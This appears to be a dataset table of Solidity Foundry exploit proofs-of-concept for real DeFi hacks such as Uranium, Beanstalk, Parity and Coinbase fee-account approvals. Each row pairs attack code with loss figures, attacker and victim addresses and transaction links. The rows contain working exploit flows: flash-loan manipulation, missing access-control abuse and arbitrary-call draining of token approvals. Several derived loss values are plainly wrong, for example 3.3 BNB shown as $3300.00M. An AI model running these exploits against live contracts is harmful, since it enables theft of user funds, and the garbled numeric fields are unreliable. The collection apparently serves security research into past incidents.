// Brrow 17.2 WBNB
bytes memory data = abi.encode(0xEeBc161437FA948AAb99383142564160c92D2974, 172 * 1e17);
... | true | https://bscscan.com/address/0xa0787daad6062349f63b7c228cbfd5d8a3db08f1#code | Unknown | 6.13 | medium | Novo Exploit (2022-05) | false | true | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1529084919976034304
// @Contract address
// https://bscscan.com/address/0x94e06c77b02ade8341489ab9a23451f68c13ec1c#code
contract ContractTe... | exploit_poc | HackDao | 2022-05 | HackDao_exp.sol | flash_loan | f92fbf10278d16dc | 2026-01-07T10:59:16.518664 | postmortems | bsc | 18,073,756 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
WBNB.approve(address(Router), type(uint256).max);
HackDao.approve(address(Router), type(uint256).max);
DVM(dodo).flashLoan(1900 * 1e18, 0, address(this), new bytes(1));
emit log_named_decimal_uint("[End] Attacker WBNB balance after exploit", WBNB.balanceO... | true | Unknown | 4.24 | low | HackDao Exploit (2022-05) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : $50 M
// Attacker : 0xd9936EA91a461aA4B727a7e0xc47bdd0a852a88a019385ea3ff57cf8de79f019d3661bcD6cD257481c
// AttackContract : 0x2b528a28451e9853f51616f3b0f6d82af8bea6ae
/... | exploit_poc | Uranium | 2021-04 | Uranium_exp.sol | null | d3c7d96485eafc8a | 2026-01-07T10:59:16.518721 | postmortems | bsc | 6,920,000 | $50 M | 50,000,000 | null | null | null | null | null | null | true | false | false | critical | $50 M | unknown | function testExploit() public {
wrap();
takeFunds(wbnb, busd, 1 ether);
takeFunds(busd, wbnb, 1 ether);
console.log("BUSD STOLEN : ", IERC20(busd).balanceOf(address(this)));
console.log("WBNB STOLEN : ", IERC20(wbnb).balanceOf(address(this)));
} | true | $50 M | $50.00M | 5.38 | medium | Uranium Exploit (2021-04) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 37.5 WBNB
// Attacker : 0x476954c752a6ee04b68382c97f7560040eda7309
// Attack Contract : 0x798465b25b68206370d99f541e11eea43288d297
// Vulnerable Contract : 0x8087720eeea59f9f04... | exploit_poc | WXC_Token | 2025-08 | WXC_Token_exp.sol | flash_loan | 98d42e0e05f702f3 | 2026-01-07T10:59:16.518769 | postmortems | bsc | null | 37.5 WBNB | 37.5 | null | null | null | https://bscscan.com/tx/0x1397bc7f0d284f8e2e30d0a9edd0db1f3eb0dd284c75e30d226b02bf09ad068f | https://x.com/TenArmorAlert/status/1954774967481962832 | https://x.com/TenArmorAlert/status/1954774967481962832 | true | true | true | low | 37.5 WBNB | flash-loan | function testExploit() public balanceLog {
//implement exploit code here
WXC.approve(address(Router), type(uint256).max);
WBNB.allowance(address(this), address(ercproxy));
WBNB.approve(address(ercproxy), type(uint256).max);
ercproxy.flashLoan(address(WBNB), flash... | true | 37.5 WBNB | https://bscscan.com/tx/0x1397bc7f0d284f8e2e30d0a9edd0db1f3eb0dd284c75e30d226b02bf09ad068f | https://x.com/TenArmorAlert/status/1954774967481962832 | https://x.com/TenArmorAlert/status/1954774967481962832 | $38 | 7.62 | medium | WXC_Token Exploit (2025-08) | true | false | true | true | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 3.3 BNB
// Attacker : https://bscscan.com/address/0x48234fb95d4d3e5a09f3ec4dd57f68281b78c825
// Attack Contract : https://bscscan.com/address/0x1dffe35fb021f124f04d1a654236e0... | exploit_poc | PDZ | 2025-08 | PDZ_exp.sol | null | dace6ad82f792cfb | 2026-01-07T10:59:16.518820 | postmortems | bsc | null | 3.3 BNB | 3,300,000,000 | https://bscscan.com/address/0x48234fb95d4d3e5a09f3ec4dd57f68281b78c825 | https://bscscan.com/address/0x1dffe35fb021f124f04d1a654236e0879fa0cb81 | https://bscscan.com/address/0x664201579057f50D23820d20558f4b61bd80BDda | https://bscscan.com/tx/0x81fd00eab3434eac93bfdf919400ae5ca280acd891f95f47691bbe3cbf6f05a5 | null | https://x.com/tikkalaresearch/status/1957500585965678828 | true | true | false | critical | 3.3 BNB | unknown | function testExploit() public balanceLog {
// Step 1: borrow 10 WBNB
IPancakePair(PANCAKE_PAIR).swap(10 ether, 0, address(this), hex"00");
} | true | 3.3 BNB | https://bscscan.com/address/0x48234fb95d4d3e5a09f3ec4dd57f68281b78c825 | https://bscscan.com/address/0x1dffe35fb021f124f04d1a654236e0879fa0cb81 | https://bscscan.com/address/0x664201579057f50D23820d20558f4b61bd80BDda | https://bscscan.com/tx/0x81fd00eab3434eac93bfdf919400ae5ca280acd891f95f47691bbe3cbf6f05a5 | https://x.com/tikkalaresearch/status/1957500585965678828 | $3300.00M | 7.74 | medium | PDZ Exploit (2025-08) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 100k USD
// Attacker : https://arbiscan.io/address/0xaa06fde501a82ce1c0365273684247a736885daf
// Attack Contract : https://arbiscan.io/address/0x2fad746cfaaf68aa098f704fb6537... | exploit_poc | EverValueCoin | 2025-08 | EverValueCoin_exp.sol | flash_loan | bd16709dce2bfffc | 2026-01-07T10:59:16.518869 | postmortems | arbitrum | null | 100k USD | 100,000 | https://arbiscan.io/address/0xaa06fde501a82ce1c0365273684247a736885daf | https://arbiscan.io/address/0x2fad746cfaaf68aa098f704fb6537b0a05786df8 | https://arbiscan.io/address/0x03339ecae41bc162dacae5c2a275c8f64d6c80a0 | https://arbiscan.io/tx/0xb13b2ab202cb902b8986cbd430d7227bf3ddca831b79786af145ccb5f00fcf3f | https://x.com/SuplabsYi/status/1961906638438445268 | https://x.com/SuplabsYi/status/1961906638438445268 | true | true | true | high | 100k USD | flash-loan | function testExploit() public balanceLog {
//implement exploit code here
morphoBlue.flashLoan(address(wbtc), 1200000000, "");
} | true | 100k USD | https://arbiscan.io/address/0xaa06fde501a82ce1c0365273684247a736885daf | https://arbiscan.io/address/0x2fad746cfaaf68aa098f704fb6537b0a05786df8 | https://arbiscan.io/address/0x03339ecae41bc162dacae5c2a275c8f64d6c80a0 | https://arbiscan.io/tx/0xb13b2ab202cb902b8986cbd430d7227bf3ddca831b79786af145ccb5f00fcf3f | https://x.com/SuplabsYi/status/1961906638438445268 | https://x.com/SuplabsYi/status/1961906638438445268 | $100.0K | 9.06 | high | EverValueCoin Exploit (2025-08) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 17k USD
// Attacker : https://bscscan.com/address/0x00b700b9da0053009cb84400ed1e8fe251002af3
// Attack Contract : https://bscscan.com/address/0x90be00229fe8000000009e007743a48... | exploit_poc | MulticallWithXera | 2025-08 | MulticallWithXera_exp.sol | null | b46153bc70d25a7d | 2026-01-07T10:59:16.518930 | postmortems | bsc | null | 17k USD | 17,000 | https://bscscan.com/address/0x00b700b9da0053009cb84400ed1e8fe251002af3 | https://bscscan.com/address/0x90be00229fe8000000009e007743a485d400c3b7 | https://bscscan.com/address/0x90be00229fe8000000009e007743a485d400c3b7 | https://bscscan.com/tx/0xed6fd61c1eb2858a1594616ddebaa414ad3b732dcdb26ac7833b46803c5c18db | https://x.com/TenArmorAlert/status/1958354933247590450 | https://x.com/TenArmorAlert/status/1958354933247590450 | true | true | false | medium | 17k USD | unknown | function testExploit() public balanceLog {
// The core of the exploit is to abuse the token approval granted by the victim to
// the Multicall contract.
// 1. Craft the malicious calldata.
// The parameters are:
// - from: the `victim` contract's address.
// - to: the `... | true | 17k USD | https://bscscan.com/address/0x00b700b9da0053009cb84400ed1e8fe251002af3 | https://bscscan.com/address/0x90be00229fe8000000009e007743a485d400c3b7 | https://bscscan.com/address/0x90be00229fe8000000009e007743a485d400c3b7 | https://bscscan.com/tx/0xed6fd61c1eb2858a1594616ddebaa414ad3b732dcdb26ac7833b46803c5c18db | https://x.com/TenArmorAlert/status/1958354933247590450 | https://x.com/TenArmorAlert/status/1958354933247590450 | $17.0K | 8.15 | high | MulticallWithXera Exploit (2025-08) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 40k USDC
// Attacker : https://basescan.org/address/0x4efd5f0749b1b91afdcd2ecf464210db733150e0
// Attack Contract : https://basescan.org/address/0x2a59ac31c58327efcbf83cc5a52... | exploit_poc | 0x8d2e | 2025-08 | 0x8d2e_exp.sol | access_control | 2316b4ba0d1be03a | 2026-01-07T10:59:16.518982 | postmortems | base | null | 40k USDC | 40,000 | https://basescan.org/address/0x4efd5f0749b1b91afdcd2ecf464210db733150e0 | https://basescan.org/address/0x2a59ac31c58327efcbf83cc5a52fae1b24a81440 | https://basescan.org/address/0x8d2Ef0d39A438C3601112AE21701819E13c41288 | https://basescan.org/tx/0x6be0c4b5414883a933639c136971026977df4737b061f864a4a04e4bd7f07106 | null | https://x.com/TenArmorAlert/status/1958354933247590450 | true | true | true | medium | 40k USDC | access-control | function testExploit() public balanceLog {
uint256 balance = IERC20(USDC_ADDR).balanceOf(VICTIM);
bytes memory data= abi.encode(USDC_ADDR, address(this));
// The victim contract (0x8d2e) lacks access control in its uniswapV3SwapCallback function.
// As a result, it transfers all USDC to ... | true | 40k USDC | https://basescan.org/address/0x4efd5f0749b1b91afdcd2ecf464210db733150e0 | https://basescan.org/address/0x2a59ac31c58327efcbf83cc5a52fae1b24a81440 | https://basescan.org/address/0x8d2Ef0d39A438C3601112AE21701819E13c41288 | https://basescan.org/tx/0x6be0c4b5414883a933639c136971026977df4737b061f864a4a04e4bd7f07106 | https://x.com/TenArmorAlert/status/1958354933247590450 | $40.0K | 7.88 | medium | 0x8d2e Exploit (2025-08) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 190 BNB
// Attacker : https://bscscan.com/address/0x4b63c0cf524f71847ea05b59f3077a224d922e8d
// Attack Contract : https://bscscan.com/address/0x3b3e1edeb726b52d5de79cf8dd8b84... | exploit_poc | d3xai | 2025-08 | d3xai_exp.sol | null | 0f0ee7de17a79d34 | 2026-01-07T10:59:16.519071 | postmortems | bsc | null | 190 BNB | 190,000,000,000 | https://bscscan.com/address/0x4b63c0cf524f71847ea05b59f3077a224d922e8d | https://bscscan.com/address/0x3b3e1edeb726b52d5de79cf8dd8b84995d9aa27c | null | https://bscscan.com/tx/0x26bcefc152d8cd49f4bb13a9f8a6846be887d7075bc81fa07aa8c0019bd6591f | null | https://x.com/suplabsyi/status/1956695597546893598 | true | true | false | critical | 190 BNB | unknown | function testExploit() public balanceLog {
// Root cause: the proxy’s exchange() lets us buy low / sell high
// Attacker exploits it using a convoluted multi-step flow
// Step 1: flash loan 20M USDT
uint256 borrowAmount = 20_000_000 ether;
IPancakeV3PoolActions(PANCAKE_V3_POOL).... | true | 190 BNB | https://bscscan.com/address/0x4b63c0cf524f71847ea05b59f3077a224d922e8d | https://bscscan.com/address/0x3b3e1edeb726b52d5de79cf8dd8b84995d9aa27c | https://bscscan.com/tx/0x26bcefc152d8cd49f4bb13a9f8a6846be887d7075bc81fa07aa8c0019bd6591f | https://x.com/suplabsyi/status/1956695597546893598 | $190000.00M | 8 | high | d3xai Exploit (2025-08) | true | false | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 300k USD
// Attacker : https://etherscan.io/address/0xC31a49D1c4C652aF57cEFDeF248f3c55b801c649
// Attack Contract : https://etherscan.io/address/0xF0D539955974b248d763D60C366... | exploit_poc | coinbase | 2025-08 | coinbase_exp.sol | null | ab37458294c19e6d | 2026-01-07T10:59:16.519156 | postmortems | ethereum | null | 300k USD | 300,000 | https://etherscan.io/address/0xC31a49D1c4C652aF57cEFDeF248f3c55b801c649 | https://etherscan.io/address/0xF0D539955974b248d763D60C3663eF272dfC6971 | null | https://etherscan.io/tx/0x33b2cb5bc3c0ccb97f0cc21e231ecb6457df242710dfce8d1b68935f0e05773b | null | https://x.com/deeberiroz/status/1955718986894549344 | true | true | false | high | 300k USD | unknown | function testExploit() public balanceLog {
// Root cause: A Coinbase fee account accidentally approved multiple ERC-20 tokens to a 0x swapper.
// The swapper lets anyone execute arbitrary calls.
// For example:
// https://etherscan.io/tx/0x8df54ebe76c09cda530f1fccb591166c716000ec95ee5cb3... | true | 300k USD | https://etherscan.io/address/0xC31a49D1c4C652aF57cEFDeF248f3c55b801c649 | https://etherscan.io/address/0xF0D539955974b248d763D60C3663eF272dfC6971 | https://etherscan.io/tx/0x33b2cb5bc3c0ccb97f0cc21e231ecb6457df242710dfce8d1b68935f0e05773b | https://x.com/deeberiroz/status/1955718986894549344 | $300.0K | 6.81 | medium | coinbase Exploit (2025-08) | true | false | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 4k USD
// Attacker : https://etherscan.io/address/0xda97a086fc74b20c88bd71e12e365027e9ec2d24
// Attack Contract : https://etherscan.io/address/0xd76c5305d0672ce5a2cdd1e8419b9... | exploit_poc | 0xf340 | 2025-08 | 0xf340_exp.sol | access_control | d3b839e16d0a0eae | 2026-01-07T10:59:16.519208 | postmortems | ethereum | null | 4k USD | 4,000 | https://etherscan.io/address/0xda97a086fc74b20c88bd71e12e365027e9ec2d24 | https://etherscan.io/address/0xd76c5305d0672ce5a2cdd1e8419b900410ea1d36 | https://etherscan.io/address/0xf340bd3eb3e82994cff5b8c3493245edbce63436 | https://etherscan.io/tx/0x103b4550a1a2bdb73e3cb5ea484880cd8bed7e4842ecdd18ed81bf67ed19e03c | https://t.me/defimon_alerts/1733 | null | true | true | true | low | 4k USD | access-control | function testExploit() public balanceLog {
//The victim contract (0xf340) lacks access control in its initVRF function allowing
//an attacker to set an address into storage and calling the function 0x607d60e6 with
//a 0 ether value which transfers LINK to that address set by the attacker.
... | true | 4k USD | https://etherscan.io/address/0xda97a086fc74b20c88bd71e12e365027e9ec2d24 | https://etherscan.io/address/0xd76c5305d0672ce5a2cdd1e8419b900410ea1d36 | https://etherscan.io/address/0xf340bd3eb3e82994cff5b8c3493245edbce63436 | https://etherscan.io/tx/0x103b4550a1a2bdb73e3cb5ea484880cd8bed7e4842ecdd18ed81bf67ed19e03c | https://t.me/defimon_alerts/1733 | $4.0K | 8.24 | high | 0xf340 Exploit (2025-08) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 500 USD
// Attacker : https://etherscan.io/address/0x07185a9e74f8dceb7d6487400e4009ff76d1af46
// Attack Contract : https://etherscan.io/address/0x6e0113c4f1de65b98381baa6443b... | exploit_poc | Hexotic | 2025-08 | Hexotic_exp.sol | null | 8f600c9d3a00da35 | 2026-01-07T10:59:16.519257 | postmortems | ethereum | null | 500 USD | 500 | https://etherscan.io/address/0x07185a9e74f8dceb7d6487400e4009ff76d1af46 | https://etherscan.io/address/0x6e0113c4f1de65b98381baa6443b20834b70d4c5 | https://arbiscan.io/address/0x03339ecae41bc162dacae5c2a275c8f64d6c80a0 | https://etherscan.io/tx/0x23b69bef57656f493548a5373300f7557777f352ade8131353ff87a1b27e2bb3 | https://t.me/defimon_alerts/1757 | null | true | true | false | low | 500 USD | unknown | function testExploit() public balanceLog {
//// Fund the test contract with 0.1 ETH to pay for gas and initial transactions.
vm.deal(address(this), 0.1 ether);
WETH.deposit{value: 0.037 ether}();
// Initiate a flash swap on the HEX Uniswap V3 Pool.
IPancakeV3Pool(uniswap... | true | 500 USD | https://etherscan.io/address/0x07185a9e74f8dceb7d6487400e4009ff76d1af46 | https://etherscan.io/address/0x6e0113c4f1de65b98381baa6443b20834b70d4c5 | https://arbiscan.io/address/0x03339ecae41bc162dacae5c2a275c8f64d6c80a0 | https://etherscan.io/tx/0x23b69bef57656f493548a5373300f7557777f352ade8131353ff87a1b27e2bb3 | https://t.me/defimon_alerts/1757 | $500 | 7.38 | medium | Hexotic Exploit (2025-08) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 19.7k USD
// Attacker : https://etherscan.io/address/0xa7e9b982b0e19a399bc737ca5346ef0ef12046da
// Attack Contract : https://etherscan.io/address/0xa6dc1fc33c03513a762cdf2810... | exploit_poc | SizeCredit | 2025-08 | SizeCredit_exp.sol | oracle_manipulation | eb0683ba22400e82 | 2026-01-07T10:59:16.519307 | postmortems | ethereum | null | 19.7k USD | 19,700 | https://etherscan.io/address/0xa7e9b982b0e19a399bc737ca5346ef0ef12046da | https://etherscan.io/address/0xa6dc1fc33c03513a762cdf2810f163b9b0fd3a71 | https://etherscan.io/address/0xf4a21ac7e51d17a0e1c8b59f7a98bb7a97806f14 | https://etherscan.io/tx/0xc7477d6a5c63b04d37a39038a28b4cbaa06beb167e390d55ad4a421dbe4067f8 | null | https://x.com/SuplabsYi/status/1956306748073230785 | true | true | true | medium | 19.7k USD | oracle-manipulation | function testExploit() public balanceLog {
// Root cause: leverageUpWithSwap lacks check of given data, attacker passed malicious data to execute arbitrary calls
IERC20 wstUSR = IERC20(PT_WSTUSR);
uint256 bal = wstUSR.balanceOf(VICTIM);
uint256 allowance = wstUSR.allowance(VICTIM, LEVERA... | true | 19.7k USD | https://etherscan.io/address/0xa7e9b982b0e19a399bc737ca5346ef0ef12046da | https://etherscan.io/address/0xa6dc1fc33c03513a762cdf2810f163b9b0fd3a71 | https://etherscan.io/address/0xf4a21ac7e51d17a0e1c8b59f7a98bb7a97806f14 | https://etherscan.io/tx/0xc7477d6a5c63b04d37a39038a28b4cbaa06beb167e390d55ad4a421dbe4067f8 | https://x.com/SuplabsYi/status/1956306748073230785 | $19.7K | 9.53 | high | SizeCredit Exploit (2025-08) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 61k USD
// Attacker : https://bscscan.com/address/0xe2336b08a43f87a4ac8de7707ab7333ba4dbaf7c
// Attack Contract : https://bscscan.com/address/0xEd35746F389177eCD52A16987b2aaC... | exploit_poc | Grizzifi | 2025-08 | Grizzifi_exp.sol | null | 9a167ed731c822c4 | 2026-01-07T10:59:16.519368 | postmortems | bsc | null | 61k USD | 61,000 | https://bscscan.com/address/0xe2336b08a43f87a4ac8de7707ab7333ba4dbaf7c | https://bscscan.com/address/0xEd35746F389177eCD52A16987b2aaC74AA0c1128 | https://bscscan.com/address/0x21ab8943380b752306abf4d49c203b011a89266b | https://bscscan.com/tx/0x36438165d701c883fd9a03631ee0cdeec35a138153720006ab59264db7e075c1 | null | https://x.com/MetaTrustAlert/status/1955967862276829375 | true | true | false | medium | 61k USD | unknown | function testExploit() public balanceLog {
//implement exploit code here
// Step 1: create 30 attack contracts and send 20 bsc-usd to each attack contract
// https://bscscan.com/tx/0x4302de51c8126e7934da9be1affbde73e5153fe1f9d0200a738a269fe07d22c7
for (uint256 i = 0; i < 30; i++) {
... | true | 61k USD | https://bscscan.com/address/0xe2336b08a43f87a4ac8de7707ab7333ba4dbaf7c | https://bscscan.com/address/0xEd35746F389177eCD52A16987b2aaC74AA0c1128 | https://bscscan.com/address/0x21ab8943380b752306abf4d49c203b011a89266b | https://bscscan.com/tx/0x36438165d701c883fd9a03631ee0cdeec35a138153720006ab59264db7e075c1 | https://x.com/MetaTrustAlert/status/1955967862276829375 | $61.0K | 7.92 | medium | Grizzifi Exploit (2025-08) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 21k USD
// Attacker : 0x59537353248d0b12c7fcca56a4e420ffec4abc91
// Attack Contract : 0x091101b0f31833c03dddd5b6411e62a212d05875
// Vulnerable Contract : 0xbeb0b0623f66bE8cE1... | exploit_poc | Bebop_dex | 2025-08 | Bebop_dex_exp.sol | null | cd8872895db092c2 | 2026-01-07T10:59:16.519425 | postmortems | arbitrum | null | 21k USD | 21,000 | null | null | null | https://arbiscan.io/tx/0xe5f8fe69b38613a855dbcb499a2c4ecffe318c620a4c4117bd0e298213b7619d | https://x.com/SuplabsYi/status/1955230173365961128 | https://x.com/SuplabsYi/status/1955230173365961128 | true | true | false | medium | 21k USD | unknown | function testExploit() public balanceLog {
// 1. Construct the JamOrder struct
JamOrder memory order = JamOrder({
taker: address(this),
receiver: address(this),
expiry: 1754987701,
exclusivityDeadline: 0,
nonce: 1,
executor: address... | true | 21k USD | https://arbiscan.io/tx/0xe5f8fe69b38613a855dbcb499a2c4ecffe318c620a4c4117bd0e298213b7619d | https://x.com/SuplabsYi/status/1955230173365961128 | https://x.com/SuplabsYi/status/1955230173365961128 | $21.0K | 7.21 | medium | Bebop_dex Exploit (2025-08) | true | false | true | true | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 78k USD
// Attacker : https://bscscan.com/address/0x26f8bf8a772b8283bc1ef657d690c19e545ccc0d
// Attack Contract : https://bscscan.com/address/0xd6b9ee63c1c360d1ea3e4d15170d20... | exploit_poc | YuliAI | 2025-08 | YuliAI_exp.sol | flash_loan | e26b29843d0ab278 | 2026-01-07T10:59:16.519476 | postmortems | bsc | null | 78k USD | 78,000 | https://bscscan.com/address/0x26f8bf8a772b8283bc1ef657d690c19e545ccc0d | https://bscscan.com/address/0xd6b9ee63c1c360d1ea3e4d15170d20638115ffaa | https://bscscan.com/address/0x8262325Bf1d8c3bE83EB99f5a74b8458Ebb96282 | https://bscscan.com/tx/0xeab946cfea49b240284d3baef24a4071313d76c39de2ee9ab00d957896a6c1c4 | null | https://x.com/TenArmorAlert/status/1955817707808432584 | true | true | true | medium | 78k USD | flash-loan | function testExploit() public balanceLog {
AttackContract attackContract = new AttackContract();
vm.deal(address(attackContract), 0.01 ether);
attackContract.swap(YULIAI, VICTIM, 200_000 ether);
}
}
contract AttackContract {
address public owner;
constructor() {
owner = msg.... | true | 78k USD | https://bscscan.com/address/0x26f8bf8a772b8283bc1ef657d690c19e545ccc0d | https://bscscan.com/address/0xd6b9ee63c1c360d1ea3e4d15170d20638115ffaa | https://bscscan.com/address/0x8262325Bf1d8c3bE83EB99f5a74b8458Ebb96282 | https://bscscan.com/tx/0xeab946cfea49b240284d3baef24a4071313d76c39de2ee9ab00d957896a6c1c4 | https://x.com/TenArmorAlert/status/1955817707808432584 | $78.0K | 9.27 | high | YuliAI Exploit (2025-08) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 10,062 BUSD
// Attacker : https://bscscan.com/address/0x53feee33527819bb793b72bd67dbf0f8466f7d2c
// Attack Contract : https://bscscan.com/address/0x90e076ef0fed49a0b6393898... | exploit_poc | ABCCApp | 2025-08 | ABCCApp_exp.sol | flash_loan | 8f306068d87a0a36 | 2026-01-07T10:59:16.519526 | postmortems | bsc | null | ~ 10,062 BUSD | 10 | https://bscscan.com/address/0x53feee33527819bb793b72bd67dbf0f8466f7d2c | https://bscscan.com/address/0x90e076ef0fed49a0b63938987f2cad6b4cd97a24 | https://bscscan.com/address/0x1bc016c00f8d603c41a582d5da745905b9d034e5 | https://bscscan.com/tx/0xee4eae6f70a6894c09fda645fb24ab841e9847a788b1b2e8cb9cc50c1866fb12 | null | https://x.com/TenArmorAlert/status/1959457212914352530 | true | true | true | low | ~ 10,062 BUSD | flash-loan | function testExploit() public balanceLog {
AttackContract attackContract = new AttackContract();
attackContract.start();
}
receive() external payable {}
}
contract AttackContract {
address attacker;
uint256 borrowedAmount = 12_500_000_000_000_000_000_000;
constructor() {
a... | true | ~ 10,062 BUSD | https://bscscan.com/address/0x53feee33527819bb793b72bd67dbf0f8466f7d2c | https://bscscan.com/address/0x90e076ef0fed49a0b63938987f2cad6b4cd97a24 | https://bscscan.com/address/0x1bc016c00f8d603c41a582d5da745905b9d034e5 | https://bscscan.com/tx/0xee4eae6f70a6894c09fda645fb24ab841e9847a788b1b2e8cb9cc50c1866fb12 | https://x.com/TenArmorAlert/status/1959457212914352530 | $10 | 9.06 | high | ABCCApp Exploit (2025-08) | true | true | true | false | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface parity {
function isOwner(
address _addr
) external view returns (bool);
function kill(
address _to
) external;
function initWallet(address[] memory ... | exploit_poc | Parity_kill | 2017-11 | Parity_kill_exp.sol | null | d19520035888d002 | 2026-01-07T10:59:16.519574 | postmortems | unknown | 4,501,735 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
WalletLibrary.isOwner(address(this)); // not a owner of contract
owner.push(address(this));
WalletLibrary.initWallet(owner, 0, 0);
bool isowner = WalletLibrary.isOwner(address(this)); // you are owner of contract now
assertTrue(isowner);
Wa... | true | Unknown | 2.61 | low | Parity_kill Exploit (2017-11) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
IWBNB wbnb = IWBNB(payable(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c));
IERC20 busd = IERC20(0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56);
IERC20 wdoge =... | exploit_poc | Wdoge | 2022-04 | Wdoge_exp.sol | null | d9cb2b059b7abda2 | 2026-01-07T10:59:16.519612 | postmortems | unknown | 17,248,705 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
IPancakePair(BUSDT_WBNB_Pair).swap(0, 2900 ether, address(this), "0x");
} | true | Unknown | 2.89 | low | Wdoge Exploit (2022-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
IPancakeRouter pancakeRouter = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78... | exploit_poc | Gym_1 | 2022-04 | Gym_1_exp.sol | null | 65ee71c99bff5876 | 2026-01-07T10:59:16.519656 | postmortems | unknown | 16,798,806 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
payable(address(0)).transfer(address(this).balance);
emit log_named_uint("Before exploit, USDC balance of attacker:", wbnb.balanceOf(msg.sender));
wbnbBusdPair.swap(2400e18, 0, address(this), new bytes(1));
emit log_named_uint("After exploit, USDC balanc... | true | Unknown | 3.74 | low | Gym_1 Exploit (2022-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IEuler {
function flashLoan(address receiver, address token, uint256 amount, bytes calldata data) external returns (bool);
}
interface ICurve {
function exchange(int128 i, int12... | exploit_poc | Saddle | 2022-04 | Saddle_exp.sol | flash_loan | 99a82fd0bb49f7ec | 2026-01-07T10:59:16.519700 | postmortems | unknown | 14,684,306 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
IEuler(eulerLoans).flashLoan(address(this), usdc, 15_000_000e6, new bytes(0));
console.log("USDC hacked: %s", IERC20(usdc).balanceOf(address(this)));
} | true | Unknown | 4.72 | low | Saddle Exploit (2022-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
CheatCodes cheat = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
... | exploit_poc | Beanstalk | 2022-04 | Beanstalk_exp.sol | flash_loan | 07c9396063f71acd | 2026-01-07T10:59:16.519749 | postmortems | unknown | 14,595,905 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
address[] memory path = new address[](2);
path[0] = uniswapv2.WETH();
path[1] = address(bean);
uniswapv2.swapExactETHForTokens{value: 75 ether}(0, path, address(this), block.timestamp + 120);
emit log_named_uint("Initial USDC balancer of attacker",... | true | Unknown | 6 | medium | Beanstalk Exploit (2022-04) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
contract ContractTest is Test {
IERC20 usdc = IERC20(0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d);
